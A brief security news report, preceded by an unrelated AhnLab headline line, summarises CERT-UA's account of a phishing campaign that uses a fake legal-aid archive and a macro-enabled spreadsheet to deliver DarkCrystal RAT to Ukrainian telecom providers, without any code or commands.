AhnLab cybersecurity researchers: The malware is downloaded and executed from a WSF file within a compressed file, delivered via URL in phishing emails.
Ukraine is targeted with DarkCrystal RAT. CERT-UA cybersecurity experts: “Free primary legal aid” email and password protected “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” spread the malware
“Free primary legal aid” email and password protected “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” spread DarkCrystal RAT in Ucraine. It has been denounced by the CERT-UA cybersecurity experts. According to the researchers, the specified RAR-archive contains the document “Algorithm_LegalAid.xlsm”, which is devoted to obtaining legal aid. If you open the document and activate the macro, a PowerShell command will be executed, which will download and run the .NET bootloader “MSCommondll.exe”. The mentioned executable file, in turn, will download and run the malware. Based on the email addresses of the recipients, as well as the domain management DarkCrystal RAT, they assume that the attack is aimed at operators and telecommunications providers of Ukraine. During the previous attack, on June 10, 2022, media organizations of Ukraine (CERT-UA # 4797) were the objects of interest of cybercrime/cyber warfare actors.